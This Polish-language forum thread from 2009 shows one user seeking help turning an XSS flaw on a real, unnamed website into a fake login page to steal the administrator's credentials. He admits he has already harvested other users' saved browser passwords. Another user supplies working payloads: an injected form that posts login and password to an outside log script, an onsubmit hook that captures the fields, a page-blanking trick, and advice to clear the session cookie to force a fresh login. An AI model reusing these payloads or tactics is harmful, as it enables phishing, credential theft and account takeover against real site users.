Pokaż wyniki 1 do 8 z 8

Temat: Frameset w XSS

  1. #1
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie Frameset w XSS

    Znalazłem ostatnio na pewnej stronie pewien błąd, pozwalający przeprowadzić atak XSS. Pobawiłem się trochę, ale teraz chciałbym zamienić zawartość strony. Chciałem zrobic coś takiego
    Kod html:
    <script>javascript:document.body.innerHTML='<frameset cols="100%,0%"><frame src="http://phishing.pl'" /><frame src="http//jakasstrona.pl" /></frameset>'</script>
    Jednak ten kod nie działa.
    Jak można zrobić coś takiego?
    Ostatnio edytowane przez ruben : 10-08-2009 - 16:42

  2. #2
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    ojjj XSS dawno sie bawilem, dzisiaj juz praktycznie nawet nie szukam tego typu bledow

    body.innerHTML dziala jesli jest znacznik body.

    polecam error console w firefoxie jak nie wiesz gdzie blad

    <script>document.body.innerHTML='<form action="http://google.com/log.php" method="post">login: <input type="text" name="login"><br>pass: <input type="password" name="pass"><br><input type="submit" value="ok"></form>'</script>

    i nie uzywaj ramek, oprostu podmien formulaz logowania lub dopisz onsubmit - wtedy baaaardzo ciezko sie polapac ze wlasnie straciles konto
    Ostatnio edytowane przez rax666 : 10-08-2009 - 18:30

  3. #3
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    chce podmienić body, i mam problem, który zaprezentuje na poniższym przykładzie
    Kod html:
    <script>document.body.innerHTML='aasas</script>';</script>
    W przeglądarce wyświetla mi się takie coś ';
    przeglądarka uznaje </script> między '' za zwykły </script> i przerywa tworzenie document.body w rezultacie nie uzyskuje odpwiedniego efektu. Jak pozbyć się tego problemu?

  4. #4
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    po co dajesz wiec </script> w srodku?
    lesli jest doklejany, to poprostu zamknij ' i dopisz <script>

  5. #5
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    Chce wstawić nowy kod strony z podmienionym action w formularzu logowania, tyle, że w tym kodzie document.body przerwa się napotykając </script> w oryginalnym kodzie między znacznikami.
    Chyba, ze można to zrobić w inny sposób?
    Myślałem o podmianie jedynie action w formularzu a nie całego kodu strony, ale nie do końca wiem jak to zrobić.
    Próbowałem zrobić coś takiego
    Kod html:
    javascript:document.getElementsByName("story")[0].value="asaas"
    W powyższym kodzie próbuje podmienić co prawda wartość pola formularza, ale i tak to nie działa. Da się zrobić coś takiego?

  6. #6
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    Kod:
    <html>
    <body>
    <form action="http://example.com/login.php" method="post">
    usr: <input name="login" /><br>
    pwd: <input name="pass" type="password"/><br>
    <input type="submit" value="login">
    </form>
    
    
    
    
    <script>
    function hakuj(){
    alert(document.getElementsByTagName('input')[0].value+'\r\n'+document.getElementsByTagName('input')[1].value);
    return true;
    }
    
    document.getElementsByTagName('form')[0].onsubmit=function(){
    return hakuj()
    }
    </script>
    
    </body>
    </html>
    sprobuj w ten sposob
    mozesz potem to wysjac w iframe, tylko nie wiem jak zrobic to asynchronicznie by nie blokowalo przekierowania i zeby wyslalo zanim przekieruje. chyba mozna otworzyc nowe okienko i tam to robic, albo cos w tym stylu.

    to, albo ramka... choc to moze sie pieknie wysypac pod IE < 6.0

  7. #7
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    Tej funkcji w js chciałem użyć na początku. W sumie powyciągałem hasła wszystkich tych użytkowników którzy używali ff lub ie i mieli zapamiętane hasła w przeglądarce. Tworzyłem niewidoczny formularz i wyciągałem domyślnie wpisane tam dane przez przeglądarkę. Pech chciał, że admin nie ma zapamiętanego hasła.
    Twój kod zaskótkowałby dopiero gdybym podmienił bodument.body, bo luka XSS nie znajduje się na stronie logowania.
    Dlatego chce żeby wyskoczyła mi strona logowania, że niby nie ma uprawnień bez logowania i w tej fałszywej stronie logoania można dopiero wstawić coś takiego. Ale bez podmienienia szaty graficznej nikt się na to nie nabierze widząc sam formularz logowania

  8. #8
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    aha, teraz rozumiem
    hmm, a ciacha nie sa moze httponly? jesli nie, poprostu wyczysc ciacho ktore trzyma hash hasla (badz haslo ) i bedzie musial sie zalogowac.

    swoja droga nie wiem czemu nie idzie nawet przez urldecode().


    ten sposob dziala, wiec jak nie masz wyjscia....
    Kod:
    <html>
    <body>
    erwerfwe
    fewfwef
    few
    
    
    <script>
    document.body.innerHTML = '';
    document.write('asdasdasdasd<!--')
    </script>
    
    
    fe
    fwefw
    f
    f
    we
    
    </body>
    </html>

    a czy mozesz zapisac ten kod na stronie, czy tylko podeslac link z GETem?



    chyba <script> sie nie wykona, czyzby dodali jakies 'zabezpieczenie' do nowego ff?
    a moze script jest parsowany w czasie ladowania strony, nie po fakcie.
    anyway, jak nie podziala jedno z dwoch rozwiazan jakie ci podalem bede dalej kombinowal.

Podobne wątki

  1. XSS i cookie
    By R3mal in forum Hacking
    Odpowiedzi: 8
    Autor: 09-04-2009, 13:22
  2. Xss
    By 4ndr1u in forum Newbie - dla początkujących!
    Odpowiedzi: 10
    Autor: 08-26-2008, 21:26
  3. Xss
    By GSG-9 in forum Hacking
    Odpowiedzi: 2
    Autor: 11-20-2007, 15:27
  4. XSS-hackme
    By vegh in forum Security
    Odpowiedzi: 0
    Autor: 03-29-2007, 01:40

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj